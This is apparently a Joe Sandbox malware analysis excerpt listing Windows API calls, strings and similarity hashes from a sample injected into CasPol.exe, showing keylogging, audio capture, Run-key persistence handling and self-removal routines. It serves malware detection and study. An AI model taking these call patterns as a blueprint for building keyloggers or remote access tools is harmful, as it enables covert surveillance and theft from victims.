• Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
• _UnwindNestedFrames.LIBCMT ref: 00438124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
• CallCatchBlock.LIBVCRUNTIME ref: 0043815D
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• API String ID: 737400349-0
• Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
• Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
• Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
• Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
• GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
• Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
• Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
• Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
• Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
• CloseHandle.KERNEL32(00000000), ref: 0041B67A
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
• Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
• Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
• Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
• Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
APIs
• GetSystemMetrics.USER32(0000004C), ref: 00418519
• GetSystemMetrics.USER32(0000004D), ref: 0041851F
• GetSystemMetrics.USER32(0000004E), ref: 00418525
• GetSystemMetrics.USER32(0000004F), ref: 0041852B
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
• Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
• Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
• Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
• Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9

APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
• Opcode ID: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
• Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
• Opcode Fuzzy Hash: 5115dc8d21cc8ae304c84a9c6d3d66be3b1fde84125eb931853a25931357237b
• Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE

Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: CountEventTick
• String ID: >G
• API String ID: 180926312-1296849874
• Opcode ID: 8681510b208d111c2b0c46276fb7d1def0d581fb781ad4e2081365c838aeaf8b
• Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
• Opcode Fuzzy Hash: 8681510b208d111c2b0c46276fb7d1def0d581fb781ad4e2081365c838aeaf8b
• Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A

APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: Info
• String ID: $fD
• API String ID: 1807457897-3092946448
• Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
• Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
• Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
• Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
• Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
• Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358

APIs
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 004049E5
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
• Opcode ID: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
• Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
• Opcode Fuzzy Hash: 56914ec683c0f854cfe337d66ad939822683803ad371fa52872332a087436636
• Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F

APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
• Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
• Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
• Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E

APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: ExistsFilePath
• String ID: alarm.wav$xIG
• API String ID: 1174141254-4080756945
• Opcode ID: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
• Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
• Opcode Fuzzy Hash: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
• Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF

APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
• Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
• Opcode Fuzzy Hash: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
• Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB

APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• API String ID: 2315374483-379896819
• Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
• Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
• Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
• Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98

APIs
• IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: LocaleValid
• String ID: IsValidLocaleName$j=D
• API String ID: 1901932003-3128777819
• Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
• Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
• Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC

Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
• Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
• Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
• Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
• Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                            • API String ID: 2738857842-2658077756
APIs
• _free.LIBCMT ref: 00448825
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
Memory Dump Source
• Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0